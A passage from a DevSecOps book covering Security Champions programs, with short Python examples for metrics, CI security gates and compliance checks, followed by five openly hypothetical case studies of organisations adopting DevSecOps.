• Reduced issues: With better understanding comes the ability to code more securely from the outset. This means fewer security issues discovered later in the development process or after deployment, saving time and resources on rework.
• Risk mitigation: By embedding security in their daily tasks, developers are actively reducing the risk of application vulnerabilities. This contributes to the overall resilience of the products they’re building, something they can take pride in.

On the other hand, the security teams are focused on mitigating risks and safeguarding the organization’s software infrastructure. Their motivations to support a Security Champions program may include the following:
• Increased visibility: The program gives the security team better insight into the development processes and potential security challenges faced by the developers. This aids in providing timely and relevant security solutions.
• Amplification of efforts: By training and supporting Security Champions, the security team can multiply their efforts. Each Champion acts as an advocate and resource for security within their team, effectively expanding the reach and impact of the security team.
• Scalability: As the organization grows, so does the challenge of maintaining security. The Security Champions program allows security best practices and awareness to scale alongside the organization, ensuring a consistent level of security is maintained.
• Improved collaboration: Often, security teams can feel distanced from development processes. The Security Champions act as a bridge, improving communication and fostering a stronger relationship between these two key groups.

How a Security Champions program would look

The Security Champions program should be well defined so that you can get the most out of it. It should have certain aspects defined very clearly:
• Clear purpose: The program should have a clearly defined purpose. This could be to improve the security posture of the organization, enhance the skills of the team, or embed security culture throughout the organization. This purpose will guide the design and implementation of the program.
• Voluntary participation: The program should be open to anyone in the organization who is interested in learning about and contributing to security. Participation should be voluntary and Champions should not feel obligated to join or remain in the program.
• Support from leadership: The program needs the support and buy-in from executive leadership to be successful. Leaders should understand the value of the program and be willing to invest time, resources, and recognition in the program and its participants.
• Defined roles and responsibilities: Champions should have defined roles and responsibilities within the program. This could include tasks such as participating in security reviews, leading security training sessions, or acting as a liaison between their team and the security team.
• Training and education: Champions should receive regular training and education on relevant security topics. This could be in the form of formal training sessions, self-paced learning, attending conferences, or learning from security experts within the organization.
• Regular communication and meetings: The program should have regular communication and meetings to keep Champions engaged, share updates, and discuss challenges and successes. This could be in the form of a monthly newsletter, regular team meetings, or one-on-one check-ins.
• Recognition and rewards: Champions should be recognized and rewarded for their contributions to the program. This could be in the form of public recognition, career advancement opportunities, or tangible rewards such as gift cards or merchandise.
• Continuous improvement: The program should be regularly evaluated and improved based on feedback from Champions and other stakeholders. This could involve measuring the impact of the program on the organization’s security posture and making adjustments as needed.
• Community and culture: The program should foster a sense of community among the Champions and help build a culture of security throughout the organization. This could be achieved through team-building activities, shared learning experiences, and collaborative problem-solving.
• Shared responsibility: The program should promote a shared responsibility model for security. This means that everyone in the organization, not just the security team, has a role to play in maintaining security. Champions can help spread this message and model secure behaviors for their peers.

The top benefits of starting a Security Champions program

A Security Champions program can offer a wide range of benefits for an organization:
• Enhanced communication: Security Champions serve as a bridge between the security team and other parts of the organization, improving communication and understanding.

• Increased security awareness: Champions help raise awareness about security threats and best practices throughout the organization. This helps create a culture of security.
• Improved secure development practices: By promoting security from the beginning of the SDLC, Champions can help reduce vulnerabilities in the end product.
• Better response to security incidents: With a Champion in each team, your organization can identify and respond to security issues more quickly and effectively.
• Cost-effectiveness: By catching and fixing potential security issues early in the development process, the Champions can help save money on expensive fixes later on.
• Scalability: The Security Champions program is a scalable model. As your organization grows, you can continue to add Champions, ensuring that security remains a top priority across all teams and projects.
• Continuous learning: The program promotes continuous learning and improvement as Champions share their knowledge and experiences with each other and their teams.
• Employee engagement: The program can boost engagement by providing interested employees an opportunity to learn more about security and take on a leadership role within their team.
• Proactive security approach: Instead of a reactive approach to security, where problems are dealt with after they arise, a Security Champions program promotes a proactive approach, with potential issues identified and addressed before they can cause harm.
• Business advantage: Last but not least, a solid security posture can offer a competitive advantage, boosting customer trust and potentially leading to increased business.

What does a Security Champion do?

A Security Champion plays several crucial roles within an organization:
• Security liaison: They act as the primary point of contact for any security issues within their team, coordinating with the central security team when necessary
• Security advocate: They promote security awareness within their team, highlighting the importance of secure coding practices and the potential risks of neglecting security
• Security mentor: They educate and guide their team members on security best practices and standards, ensuring everyone is equipped to contribute to a secure development environment
• Security analyst: They contribute to risk assessments, threat modeling, and security testing efforts within their team, identifying potential vulnerabilities and solutions
• Security integrator: They work to integrate security into the SDLC, from design to deployment, ensuring security is not just an afterthought


• Security innovator: They stay updated with the latest trends and developments in the cybersecurity field and bring innovative solutions to improve security within their team and organization
• Security problem solver: They help address and resolve security issues that may arise during development, leveraging their understanding of both the technical and security aspects of the project

Security Champions program – why do you need it?

A Security Champions program is beneficial for several reasons:
• Improved security culture: By having designated individuals promoting good security practices within their teams, the organization can foster a more robust security culture. This increased awareness and knowledge can reduce vulnerabilities.
• Better communication: Security Champions can act as a bridge between the security team and the rest of the organization, improving the understanding and communication of security-related matters.
• Efficient security integration: Champions help integrate security into every stage of the development process, reducing the potential for costly fixes later on due to security oversights.
• Proactive threat management: With trained individuals looking out for security risks in their respective teams, organizations can identify and address threats earlier and more effectively.
• Employee development: For individuals interested in security, the program offers a chance to develop their skills and knowledge further, enhancing their career growth.
• Scalable security: As an organization grows, a Security Champions program provides a scalable way to ensure that security practices and awareness keep pace.
• Customer confidence: Demonstrating a commitment to security can increase customers’ trust in your organization’s products or services. Organizations often feature their Security Champions program on their official website, especially on pages dedicated to security practices and policies. They might also mention the program in blogs, newsletters, or security updates to their customers.

Beyond these organizational benefits, the individuals you select as Champions should bring certain qualities:
• Technical expertise: As they will need to understand and communicate about technical issues related to security, they should ideally have a good understanding of the technology and development practices being used in their team.
• Good communication skills: The role of a Security Champion involves acting as a bridge between the security team and their own team, as well as advocating for secure practices. This requires strong communication and persuasion skills.
• Respect of peers: To influence their team effectively, a Security Champion should ideally be someone who is respected and listened to by their peers.

• Problem-solving skills: Dealing with security involves handling unexpected challenges and puzzles. A good Security Champion should enjoy problem-solving.
• Proactivity: A Security Champion should be proactive, taking the initiative to learn about the latest security threats and countermeasures, and actively looking for ways to improve their team’s security practices.

Shared responsibility models
In the context of a Security Champions program, a shared responsibility model refers to how security tasks and responsibilities are divided between the security team, the champions themselves, and the rest of the development team. It’s about ensuring that everyone has a role to play in maintaining and enhancing security:
• Security team responsibilities: The central security team provides training and guidance to Security Champions and oversees the overall security strategy. They also handle more complex security issues and keep up with the latest threat intelligence.
• Security Champion responsibilities: Security Champions act as the bridge between the security team and the development team. They raise security awareness within their team, provide advice on security-related matters, help incorporate security practices into the development process, and act as the first point of contact for security concerns within their team.
• Development team responsibilities: All members of the development team have a part to play in security. They should follow secure coding practices, be aware of common security risks in their work, and follow the advice and guidance provided by their Security Champion and the security team.

The roles of different teams
The Security Champions program involves different roles from various teams in an organization, each playing a crucial part in its success. Here’s a general idea of how different teams might be involved:
• Sec team: The Sec team provides the necessary training, tools, and guidance to the Security Champions. They also handle advanced security threats and complex issues that require deep expertise. The Sec team works closely with the champions, answering their queries and supporting them in their role.
• Dev teams: Members of these teams are the primary audience for the Security Champions. They’re responsible for implementing secure coding practices and integrating security measures into the SDLC. Devs should be open to learning from the Champions and should apply the knowledge shared about security best practices in their day-to-day work.


Setting Up a Security Champions Program

• Security Champions: Champions themselves are part of the development teams, but they have an additional responsibility to promote and instill a culture of security within their team. They act as the bridge between the Sec and Dev teams, help their peers understand security needs, and participate actively in security planning and risk assessment.
• Management/leadership team: The leadership team plays a crucial role in endorsing and supporting the Security Champions program. They need to foster an organizational culture that values security and provides resources for the program’s successful execution. The leadership team is also essential in recognizing and rewarding the efforts of Security Champions, thus encouraging the continuation and growth of the program.
• HR and learning and development teams: These teams often collaborate to create and deliver training programs for the Security Champions. They also work on the recognition and reward schemes for the champions and can assist in selecting the right individuals for the champion roles.
• Ops team: In organizations with a DevOps approach, the Ops team also plays a significant role. They work with the Dev and Sec teams to ensure that secure practices are followed not just during development, but also during the deployment and maintenance stages.

Buy-in from the executive
Securing buy-in from executives is a critical part of establishing a successful Security Champions program. Let’s look at a few reasons why executive support is necessary and how it can be secured.

The importance of executive buy-in
• Resource allocation: Executive buy-in often translates into allocating necessary resources – such as time, training materials, and perhaps even software or hardware tools – to support the Security Champions program.
• Culture shift: For a Security Champions program to be effective, there often needs to be a shift in organizational culture toward prioritizing security. This kind of cultural change typically requires leadership from the top.
• Reward and recognition: Executive support can also facilitate the recognition and reward of Security Champions, encouraging their continued efforts and motivating others to participate.

How to secure executive buy-in
• Clearly articulate the benefits: Explain how a Security Champions program can help protect the organization from cybersecurity risks, and how it can contribute to the company’s overall goals.
• Provide evidence: Use case studies or examples from other organizations to show the effectiveness of Security Champions programs.


• Show ROI: Try to quantify the potential return on investment. This could be in terms of cost savings from preventing security breaches, or potential gains from improved customer trust and reputation.
• Start small: Consider running a pilot program within a single team or department. Demonstrating success on a small scale can help to persuade executives of the value of a wider roll-out.
• Continuous communication: Keep the lines of communication open. Regularly update executives on the progress of the program and the positive changes it’s bringing about.

Measuring the effect of the Security Champions program
Certain metrics and indicators can be used to evaluate the program’s impact. The key to successful measurement is to identify which metrics are most meaningful for your organization, and then to track them consistently over time. Keep in mind that the true value of a Security Champions program lies in its ability to create a more security-conscious culture, which ultimately leads to safer software development practices.

Technical aspects to check the effectiveness of the Security Champions program
Evaluating the effectiveness of a Security Champions program involves examining both quantitative metrics and qualitative feedback. Here’s how this can be done in layperson’s terms:
• Fewer security issues: Think of it like trying to lose weight: if the numbers on the scale go down over time, you know your fitness program is working. Similarly, if the number of security issues your organization faces goes down over time, it’s a good sign that the Security Champions program is working.
• Quicker problem-solving: Just as a practiced mechanic can fix a car faster, if the time it takes to fix security issues is decreasing, it suggests that your team is getting better and faster at dealing with these problems. This improvement can be credited to your Security Champions program.
• Active participation in training: If your team is enthusiastically attending security training sessions and actively participating, it’s like kids who can’t wait to go to their favorite class. This eagerness shows that the team is engaged and taking security matters seriously, a positive outcome of the Security Champions program.
• More security reports: If people suddenly start reporting more broken streetlights in a neighborhood, it could mean that they’re paying more attention to their surroundings. An increase in security reports indicates heightened awareness. However, it’s essential to separate genuine findings from false positives.


• Feedback from participants: Just like you’d check online reviews before choosing a restaurant, collecting feedback from participants in the Security Champions program can provide valuable insight. If participants are generally positive about the program and believe that it’s beneficial, it indicates that the program is effective.
• Cultural shift: Sometimes, the effectiveness of a program is reflected in changes in attitudes and behavior. If your organization starts to value security more and sees it as everyone’s responsibility, then your Security Champions program has done its job. It’s like a neighborhood watch program that results in a community becoming more safety-conscious.
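Several of the quantitative signals above (fewer findings, faster fixes) can be tracked with a few lines of scripting. The following is a minimal sketch that computes mean time to remediate (MTTR) per quarter from an issue-tracker export; the record fields (`opened`, `closed`, `quarter`) are illustrative and not any particular tool’s schema:

```python
from datetime import datetime
from statistics import mean

# Illustrative export from an issue tracker: one record per security finding.
findings = [
    {"opened": "2023-01-05", "closed": "2023-01-25", "quarter": "Q1"},
    {"opened": "2023-02-10", "closed": "2023-02-20", "quarter": "Q1"},
    {"opened": "2023-07-01", "closed": "2023-07-06", "quarter": "Q3"},
]

def days_open(finding):
    """Number of days a finding stayed open."""
    fmt = "%Y-%m-%d"
    opened = datetime.strptime(finding["opened"], fmt)
    closed = datetime.strptime(finding["closed"], fmt)
    return (closed - opened).days

def mttr_by_quarter(findings):
    """Mean time to remediate (in days), grouped by quarter."""
    by_quarter = {}
    for f in findings:
        by_quarter.setdefault(f["quarter"], []).append(days_open(f))
    return {q: mean(days) for q, days in by_quarter.items()}

print(mttr_by_quarter(findings))  # prints {'Q1': 15, 'Q3': 5}
```

A falling MTTR from quarter to quarter suggests the champions’ coaching is paying off; a rising one is a prompt to investigate where fixes are getting stuck.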

Strategic aspects to check the effectiveness of the Security Champions program
• Adoption: Imagine you’ve started a new book club. The club’s success isn’t just about the number of members but also about how actively they participate. It’s about who keeps coming back and who brings their friends along. Similarly, with a Security Champions program, you measure adoption not just by the number of champions you have, but also by how many development teams they influence and how long they stick around.
• Engagement: Think of this as a team sport. Not everyone will be equally involved at all times; some might be the star players, while others might be benchwarmers. But what’s important is that everyone feels like they’re part of the team. In the Security Champions program, we don’t just count the hours champions put in. We look at their active involvement, such as attending meetings or initiating security activities. It’s not about penalizing those who are less involved but about finding ways to make the program more interesting for everyone.
• Impact: Imagine you’re trying to get your kids to clean their rooms. Instead of doing it for them, you’re teaching them how to do it themselves. Similarly, the goal of the Security Champions program is to empower the Dev teams to handle security issues on their own. By using a scorecard, teams can assess their progress, identify their challenges, and plan improvements. This gives a tangible measure of how much impact the program has had.
• Progress: Let’s think of this as learning to play a musical instrument. Some people might be happy strumming a few chords, while others might aspire to play complex solos. You measure progress by noting how far each person has come from their starting point. Similarly, in the Security Champions program, progress isn’t measured by how much champions know compared to others, but how much more they know now compared to when they started.
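The scorecard mentioned under impact can be as simple as a weighted rubric that each team rates itself against periodically. The sketch below is entirely hypothetical: the categories, weights, and 0–3 scale are placeholders for whatever practices matter in your organization.

```python
# Hypothetical team security scorecard: each practice is rated 0-3 by the team
# (0 = not started, 3 = fully adopted). Categories and weights are illustrative.
RUBRIC = {
    "threat_modeling": 2,       # the value is the weight of the practice
    "secure_code_review": 3,
    "dependency_scanning": 2,
    "incident_drills": 1,
}

def score(ratings):
    """Weighted score as a percentage of the maximum possible."""
    earned = sum(RUBRIC[name] * rating for name, rating in ratings.items())
    maximum = sum(weight * 3 for weight in RUBRIC.values())
    return round(100 * earned / maximum, 1)

baseline = {"threat_modeling": 0, "secure_code_review": 1,
            "dependency_scanning": 1, "incident_drills": 0}
current = {"threat_modeling": 2, "secure_code_review": 2,
           "dependency_scanning": 3, "incident_drills": 1}

print(score(baseline), "->", score(current))  # prints 20.8 -> 70.8
```

The important design choice, echoing the Progress point above, is that each team is compared against its own baseline rather than against other teams.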


Summary
In conclusion, a Security Champions program is a highly effective strategy for enhancing an organization’s security posture. It empowers developers and other team members to play a vital role in the organization’s security efforts, fosters a culture of shared responsibility, and creates a community of individuals committed to and educated about security.
When implemented correctly, the program bridges the gap between Dev and Sec teams, ensuring that security is integrated seamlessly into the SDLC rather than being an afterthought or a roadblock. It also facilitates continuous learning and development, providing participants with the knowledge and skills to keep up with evolving threats and security best practices.
However, creating and maintaining a successful Security Champions program requires strategic planning, executive buy-in, regular training, clear communication, and consistent recognition of participants’ contributions. It’s not a one-size-fits-all solution – it should be tailored to the needs and culture of your organization.
In the end, the true measure of the program’s success lies not just in the reduction of security incidents, but also in the growth of your team’s security awareness, the development of a proactive security mindset, and the establishment of security as a shared, organization-wide responsibility.
The next chapter will cover some case studies around DevSecOps implementation strategies and stories.


Part 6: Case Studies and Conclusion
This part covers some case studies and summarizes the book. This part has the following chapters:
• Chapter 15, Case Studies
• Chapter 16, Conclusion

15
Case Studies
Case studies in DevSecOps illustrate real-world examples of how businesses implement DevSecOps principles, the challenges they face, the strategies they employ, and the results they achieve. By studying these case studies, organizations can learn best practices and avoid potential pitfalls in their DevSecOps journey. Here are summaries of five hypothetical DevSecOps case studies that we will cover in this chapter:
• FinTech sector (FinServ Corporation): FinServ Corporation, a FinTech company, adopted DevSecOps to enhance its security posture, ensure compliance with various industry regulations, and accelerate software delivery. The transition reinforced customer trust and enabled it to maintain a competitive edge in its market.
• Large e-commerce platform (Verma Enterprises): Verma Enterprises adopted DevSecOps to address security issues arising from its Agile-DevOps model. By incorporating a security-first mindset and integrating security tools into its CI/CD pipeline, it significantly reduced vulnerabilities, improved regulatory compliance, and accelerated release cycles.
• Healthcare provider (HealthPlus): To secure sensitive health data and maintain regulatory compliance, HealthPlus integrated DevSecOps into its software development process. This enhanced its security posture, simplified regulatory compliance, and enabled faster responses to security incidents, all without sacrificing the speed of development.
• Government agency (GovAgency): GovAgency transitioned to DevSecOps to address the critical need for security and compliance that’s inherent in government operations. The shift improved its overall security posture, assured compliance, enabled rapid responses to security incidents, and allowed quicker software delivery for more responsive public services.
• IT sector (TechSoft): TechSoft, an IT company, adopted DevSecOps to enhance its security posture, ensure compliance with various industry regulations, and accelerate software delivery. This transition reinforced customer trust and enabled it to maintain a competitive edge in its market.


Case study 1 – FinServ Corporation
Let’s consider a hypothetical global financial services firm, FinServ Corporation. FinServ has a large, complex technology environment due to its size and the nature of its business. Its IT team was traditionally siloed, with distinct teams for development, operations, and security.
Software development at FinServ was initially structured around a waterfall model, with lengthy development cycles and infrequent, large-scale software releases. As the company faced increased competition, the need for more rapid and iterative software releases became evident. This led to the adoption of Agile and DevOps practices to increase the speed and frequency of deployments.

Challenges faced before implementing DevSecOps
• Security was a bottleneck: Security reviews were conducted at the end of development cycles and often identified issues requiring significant rework. This caused delays in software releases and frustration among the development teams. Security is not inherently a bottleneck, but it becomes one when it is bolted on at the end of the cycle in this way.
• Lack of shared responsibility for security: The DevOps teams viewed security as the exclusive responsibility of the security team, leading to a lack of accountability for security issues among developers and operations staff.
• Increased risk of breaches: With an increased frequency of deployments, the risk of security vulnerabilities making it to production also increased.

Steps taken to transition to DevSecOps
• Culture shift: The first step was fostering a culture where everyone was responsible for security. This involved training for Dev and Ops staff on security best practices and the importance of secure coding.
• Incorporating security into the CI/CD pipeline: FinServ implemented automated security checks in its CI/CD pipeline, such as static (SAST) and dynamic (DAST) application security testing, allowing for early and frequent security checks.
• Regular communication and collaboration: Cross-functional meetings were instituted to encourage better communication between the Dev, Ops, and Sec teams.
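To make the pipeline step concrete, here is a hedged sketch of the kind of fail-fast gate a CI job can run over a SAST report. The JSON shape is invented for illustration; real scanners such as Semgrep or Bandit each emit their own report formats, so a real gate would parse the schema of whichever tool you use.

```python
import json

# Illustrative SAST report. Real scanners emit their own JSON schemas;
# adapt the field names to your tool's output.
REPORT = """
[
  {"rule": "sql-injection", "severity": "HIGH", "file": "app/db.py", "line": 42},
  {"rule": "weak-hash", "severity": "MEDIUM", "file": "app/auth.py", "line": 7}
]
"""

BLOCKING = {"CRITICAL", "HIGH"}  # severities that should fail the build

def gate(report_json):
    """Return a CI exit code: non-zero if any blocking finding is present."""
    blockers = [f for f in json.loads(report_json) if f["severity"] in BLOCKING]
    for f in blockers:
        print(f"BLOCKED: {f['rule']} at {f['file']}:{f['line']}")
    return 1 if blockers else 0

exit_code = gate(REPORT)  # in a real pipeline: sys.exit(exit_code)
```

Failing the build on high-severity findings only, while merely reporting the rest, is one pragmatic way to keep the gate from becoming the very bottleneck it replaces.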

Results and impact on the company’s software development
• Improved security posture: Early and frequent security testing led to a reduction in vulnerabilities in the production code, improving the overall security of the company’s applications.


• Reduced time to market: With security integrated into the DevOps pipeline, there was a reduction in delays associated with late-stage security rework. This improved the speed and efficiency of software releases.
• Increased collaboration and shared responsibility: The culture shift toward shared responsibility for security improved collaboration between teams and increased accountability among developers and operations staff.

Lessons learned
• Security as a shared responsibility: It’s crucial to foster a culture where security is seen as everyone’s responsibility, not just the Sec team’s
• Early and frequent security checks: Incorporating security into the CI/CD pipeline enables early identification and rectification of vulnerabilities
• Effective communication and collaboration: Regular communication and collaboration between teams is key to successfully implementing DevSecOps

Case study 2 – Verma Enterprises
Verma Enterprises is a hypothetical global e-commerce platform that caters to millions of customers and hosts hundreds of thousands of sellers. Its platform involves complex architectures, including web servers, database systems, microservices, and APIs, all working together to deliver a seamless shopping experience.
Initially, Verma Enterprises employed a traditional waterfall model for software development. As the need for frequent updates and quicker deployment cycles became more evident, it transitioned to an Agile-DevOps model. This move increased its deployment speed and frequency, enabling it to better respond to changing customer needs and market dynamics.

Challenges faced by the organization in terms of security
• Delayed security testing: As in many DevOps setups, security testing was a separate stage conducted at the end of the development cycle. This late-stage security testing often revealed vulnerabilities that required significant rework, causing costly delays.
• Escalating cybersecurity threats: Being a global e-commerce platform, Verma Enterprises was an attractive target for cybercriminals. The increase in cyber-attacks demanded a more proactive and integrated approach to security.
• Regulatory compliance: Due to the nature of its business, Verma Enterprises needed to comply with numerous data security regulations. Maintaining compliance was a continuous challenge, especially with the fast-paced DevOps cycles.


Implementation of DevSecOps practices and tools
To tackle these challenges, Verma Enterprises decided to incorporate DevSecOps principles into its software development process:
• Security as a cultural shift: It began by instilling a security-first mindset across the organization. Devs, Ops teams, and security personnel were trained to view security as a shared responsibility.
• Integration of security into the CI/CD pipeline: Verma Enterprises integrated security tools into its existing CI/CD pipeline. SAST and DAST were incorporated into the early stages of the pipeline, allowing vulnerabilities to be detected and fixed before they could reach production.
• Automated compliance checks: To address regulatory challenges, Verma Enterprises used automated compliance tools. These tools checked for compliance continuously throughout the development life cycle, reducing the risk of non-compliance.
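Automated compliance checks of the kind described above are often expressed as "policy as code": small executable rules evaluated against service configuration on every pipeline run. The rules below are illustrative only and map to no specific regulation; dedicated tools such as Open Policy Agent are the usual production choice.

```python
# Policy-as-code sketch: each rule inspects a service's configuration and the
# pipeline reports (or fails on) violations. Rule names and config keys are
# illustrative, not a real regulatory mapping.
RULES = {
    "encryption-at-rest": lambda cfg: cfg.get("storage_encrypted") is True,
    # String comparison works for TLS versions 1.0-1.3; a real check
    # would parse the version properly.
    "tls-only": lambda cfg: cfg.get("min_tls_version", "") >= "1.2",
    "audit-logging": lambda cfg: cfg.get("audit_log_enabled") is True,
}

def check(config):
    """Return the names of all violated rules (an empty list means compliant)."""
    return [name for name, rule in RULES.items() if not rule(config)]

service = {"storage_encrypted": True, "min_tls_version": "1.0",
           "audit_log_enabled": True}
print(check(service))  # prints ['tls-only']
```

Because the rules run on every commit rather than during a periodic audit, non-compliant changes are caught at the point where they are cheapest to fix.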

Results and benefits achieved
• Increased security: Early and frequent security testing greatly reduced the vulnerabilities that made it to production. The number of successful cyber-attacks dropped significantly.
• Faster release cycles: By removing the need for late-stage security rework, Verma Enterprises shortened its software release cycles. This allowed it to respond more quickly to market changes and customer demands.
• Improved compliance: The continuous compliance checks greatly simplified regulatory compliance, reducing the risk of violations and penalties.
Verma Enterprises’ transition to DevSecOps demonstrates how organizations can enhance their security posture without sacrificing speed and agility. By integrating security into every stage of the software development life cycle, Verma Enterprises was able to secure its platform, improve compliance, and deliver faster updates to its customers.

Case study 3 – HealthPlus
Our subject here is HealthPlus, a hypothetical large healthcare provider that operates numerous hospitals and clinics and uses complex software systems to manage patient data, medical records, appointment scheduling, and billing. Its software environment is a mix of legacy systems and newer cloud-based applications.
Initially, HealthPlus followed a traditional waterfall model for software development. However, with the increased need for real-time data, it transitioned to an Agile-DevOps model, which significantly improved the speed and flexibility of its software development and deployment process.


The importance of security in healthcare data and systems
Healthcare providers such as HealthPlus manage extremely sensitive data, such as patient health records and personally identifiable information (PII). As such, they are bound by strict regulations such as the Health Insurance Portability and Accountability Act (HIPAA) in the US or the General Data Protection Regulation (GDPR) in the EU. Furthermore, healthcare providers are prime targets for cyberattacks, which can lead to data breaches, financial losses, reputational damage, and potentially severe consequences for patient care.

The implementation of DevSecOps practices and tools to improve security
• Cultural shift: HealthPlus began by promoting a culture of shared responsibility for security. This involved training and awareness programs for developers, operations staff, and the security team.
• Security integration: HealthPlus incorporated security checks into its existing CI/CD pipeline. This included SAST and DAST, as well as automated compliance checks to ensure adherence to healthcare-specific regulations.
• Security monitoring and incident response: HealthPlus implemented continuous security monitoring tools to detect potential breaches or attacks in real time. It also developed an incident response plan to address potential security incidents quickly and effectively.
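Continuous security monitoring ultimately reduces to rules evaluated over an event stream. As a toy illustration of the idea (the threshold, window, and event shape are all made up), here is a detector that flags an account with repeated failed logins inside a short window; a production system would use a SIEM platform rather than a hand-rolled script.

```python
from collections import defaultdict

WINDOW_SECONDS = 60  # illustrative sliding window
THRESHOLD = 5        # illustrative failure count that triggers an alert

def detect(events):
    """events: iterable of (timestamp_seconds, account, outcome).
    Yields (timestamp, account) whenever an account accumulates
    THRESHOLD failures within WINDOW_SECONDS."""
    failures = defaultdict(list)
    for ts, account, outcome in sorted(events):
        if outcome != "failure":
            continue
        # Keep only failures still inside the sliding window.
        recent = [t for t in failures[account] if ts - t < WINDOW_SECONDS]
        recent.append(ts)
        failures[account] = recent
        if len(recent) >= THRESHOLD:
            yield (ts, account)

events = [(i, "alice", "failure") for i in range(5)] + [(10, "bob", "success")]
print(list(detect(events)))  # prints [(4, 'alice')]
```

The incident response plan then determines what happens when such an alert fires: who is paged, what is locked down, and how the event is triaged.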

Results and benefits achieved
• Improved security posture: By integrating security checks early and often throughout the development process, HealthPlus greatly reduced the number of vulnerabilities in its software systems. This significantly improved its overall security posture and reduced the risk of data breaches.
• Enhanced compliance: The continuous compliance checks simplified the process of maintaining adherence to healthcare regulations. This reduced the risk of non-compliance and potential associated penalties.
• Faster response to security incidents: The continuous security monitoring and incident response plan allowed HealthPlus to quickly detect and respond to security incidents, minimizing potential damage.
• Accelerated deployment: By removing the bottleneck of late-stage security reviews, HealthPlus was able to accelerate its software deployment cycles, delivering new features and improvements to its users more quickly.
The implementation of DevSecOps at HealthPlus highlights how healthcare providers can improve security and compliance without sacrificing the agility and speed of DevOps.


Case study 4 – GovAgency Let’s imagine a hypothetical government agency, GovAgency, that is responsible for providing numerous public services, including tax processing, benefit distribution, and identity verification. Its systems are a complex mixture of legacy and modern applications, processing vast amounts of sensitive personal data daily. Initially, GovAgency followed traditional, bureaucratic software development processes with lengthy approval chains, resulting in slow and infrequent software updates. However, in recent years, it shifted to an Agile-DevOps model to improve responsiveness and service delivery.

Security requirements for government agencies
Security and compliance are paramount for government agencies such as GovAgency. It must adhere to strict regulations such as the Federal Information Security Management Act (FISMA) in the US, and it manages highly sensitive data that could have national security implications if breached. Furthermore, being a government body, GovAgency is highly visible and a potential target for cyberattacks, including state-sponsored attacks, which can be highly sophisticated and damaging.

The implementation of DevSecOps practices and tools to meet compliance and improve security
Given these security and compliance imperatives, GovAgency decided to implement DevSecOps practices and tools:
• Culture shift: GovAgency initiated an organization-wide culture change, emphasizing that security was everyone’s responsibility. This shift was supported by comprehensive training and awareness programs.
• Security integration: GovAgency integrated security testing tools into its CI/CD pipeline. This included SAST and DAST, automated compliance checks, and container security to ensure the security of its increasingly containerized applications.
• Continuous monitoring and response: GovAgency also implemented real-time security monitoring and a robust incident response plan to detect and address any security breaches swiftly.

Results and benefits achieved
• Enhanced security: Early and frequent security testing resulted in fewer vulnerabilities in its software, reducing the risk of data breaches and improving its overall security posture.
• Compliance assurance: The continuous compliance checks automated much of the compliance process, reducing the risk of violations and the potential costs and reputational damage associated with non-compliance.


• Rapid incident response: The security monitoring and incident response plan allowed GovAgency to respond quickly to potential security incidents, minimizing their impact and the potential disruption of services.
• Faster delivery: By incorporating security into the DevOps pipeline, GovAgency could accelerate its software delivery, enabling quicker updates and more responsive public services.
This case study demonstrates the transformative potential of DevSecOps in a government setting, delivering enhanced security, assured compliance, and faster service delivery despite the unique challenges and pressures faced by such organizations.

Case study 5 – TechSoft
Let’s discuss TechSoft, a hypothetical global IT company that specializes in developing business software solutions across different industries, from finance to healthcare. TechSoft operates on a large scale, with thousands of developers working on multiple projects concurrently.
TechSoft had adopted Agile-DevOps practices to maintain a competitive edge, deliver frequent updates, and respond rapidly to market demands. This approach, however, has had the side effect of increasing the complexity of its software development environment, which consists of a diverse technology stack and a vast code base.

Security requirements for the IT sector
Given the nature of its business, TechSoft is expected to adhere to a variety of industry-specific security standards, such as ISO 27001, and regulations depending on its clients’ sectors (for example, HIPAA for healthcare and PCI-DSS for finance). Beyond regulatory compliance, the trust of TechSoft’s clients hinges on its ability to develop secure software that can withstand the escalating threat landscape.

The implementation of DevSecOps practices and tools to meet compliance and improve security
To manage these challenges and reinforce its security posture, TechSoft decided to adopt DevSecOps. Its approach involved the following:
• Promoting a security culture: TechSoft began by promoting a culture of shared responsibility for security. This involved training for developers, operations staff, and the security team to cultivate a security-first mindset.
• Security integration: TechSoft integrated security tools into its existing CI/CD pipeline, allowing early detection of vulnerabilities. This included both SAST and DAST tools, as well as software composition analysis (SCA) tools to inspect third-party libraries and components for potential vulnerabilities.


• Automated compliance: To ease the burden of complying with a wide range of regulations, TechSoft utilized automated compliance check tools within its development pipeline.

Results and benefits achieved
• Enhanced security posture: Early and frequent security testing significantly reduced the vulnerabilities in its software, leading to a stronger security posture and enhanced client trust.
• Regulatory compliance: Automated compliance checks greatly simplified the process of maintaining adherence to multiple industry regulations, reducing the risk of violations.
• Accelerated delivery: By removing the bottleneck of late-stage security reviews, TechSoft accelerated its software delivery, enabling more rapid updates and improvements for its clients.
• Customer trust: The visible commitment to security and the demonstrated reduction in vulnerabilities helped build customer trust, a crucial factor in TechSoft’s competitive landscape.
In conclusion, TechSoft’s successful implementation of DevSecOps provides a strong example of how companies in the IT sector can effectively balance the need for rapid, agile software development with robust security and compliance.

Common lessons learned and best practices
Several common themes emerge from these case studies:
• Culture shift: In each case, the organization recognized the need for a cultural change toward security being everyone’s responsibility. This typically involved extensive training and awareness programs.
• Security integration: Each organization integrated security into its CI/CD pipeline, enabling it to detect and remediate vulnerabilities early in the development cycle.
• Continuous monitoring and compliance: Continuous security monitoring and compliance checks were crucial for detecting potential breaches in real time and ensuring adherence to necessary regulations.

Lessons learned from implementing DevSecOps practices and tools
• Early integration is key: Integrating security early in the development cycle is more effective and efficient than trying to bolt it on later.
• Security is everyone’s responsibility: A successful DevSecOps implementation requires a cultural shift toward shared security responsibility. It cannot be the sole province of a separate security team.


• Continuous learning and improvement: The security landscape is continuously evolving. Therefore, continuous learning and improvement are vital for maintaining an effective security posture.

Best practices for implementing DevSecOps in software development
• Culture shift: Foster a culture where every team member, from Devs to Ops, takes responsibility for security. This can be supported by training and awareness programs.
• Security in the pipeline: Integrate security testing and compliance checks into your CI/CD pipeline. Use automated tools for SAST and DAST, container security, and compliance checks.
• Continuous monitoring: Implement real-time security monitoring tools to detect potential breaches or attacks swiftly.
• Incident response plan: Develop an effective incident response plan to ensure quick and effective handling of any security incidents.
• Feedback loops: Implement feedback loops to learn from incidents and continually improve your security posture.
• Staying updated: Continuously educate the team on the latest threats and best security practices to stay ahead in the rapidly evolving security landscape.

Summary
